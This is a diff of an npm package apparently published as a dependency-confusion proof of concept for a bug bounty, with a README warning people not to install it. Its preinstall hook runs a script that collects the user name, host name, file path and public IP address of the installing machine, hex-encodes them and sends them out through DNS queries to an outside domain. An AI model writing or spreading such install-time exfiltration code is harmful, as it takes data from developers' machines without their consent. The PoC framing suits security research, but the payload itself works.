@capdesk/camo 99.0.2

package/README.md

@@ -0,0 +1,3 @@
+# DO NOT INSTALL THIS
+
+This is a PoC package not meant to be intentionally installed by anyone.

package/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "@capdesk/camo",
+  "version": "99.0.2",
+  "description": "This is a PoC package not meant to be intentionally installed by anyone.",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "malacupa@wearehackerone.com",
+  "license": "ISC"
+}

package/preinstall.js

@@ -0,0 +1,48 @@
+const dns = require('dns');
+const os = require('os');
+const dom = "lobiro.site";
+const stamp = Date.now().toString();
+const pkgid = '333';
+
+function resolve(hostname) {
+    //console.log(hostname, function (a,b) {});
+    dns.resolve4(hostname, function (a,b) {});
+}
+
+function pingback(str, id) {
+    str = Buffer.from(str, 'utf8').toString('hex');
+    var parts = str.match(new RegExp('.{1,62}', 'g'));
+    var hostname = "";
+    var id = id + pkgid;
+    var suffix = '.' + stamp + '.' + dom;
+    var idx;
+
+    for (var i = 0, j = 0; i < parts.length; i++, idx = id + '-' + j.toString()) {
+        if (i % 3 == 0 && i > 0) {
+            resolve(hostname + idx + suffix);
+            j++; 
+            hostname = ""
+        }
+        hostname += parts[i] + ".";
+    }
+    resolve(hostname + idx + suffix);
+
+}
+
+pingback(os.userInfo().username, 'u');
+pingback(os.hostname(), 'h');
+pingback(__filename, 'f');
+
+const http = require('http');
+http.get('http://ipv4.icanhazip.com', (res) => {
+    var data = [];
+    res.on('data', (chunk) => {
+        data.push(chunk);
+    })
+
+    res.on('end', () => {
+        pingback(data.toString(), 'i');
+    })
+})
+
+